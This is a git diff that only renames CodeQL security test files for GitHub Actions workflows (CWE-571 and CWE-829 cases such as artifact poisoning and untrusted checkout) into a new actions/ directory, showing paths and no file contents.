100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref rename to actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml rename to actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml similarity index 100% rename from 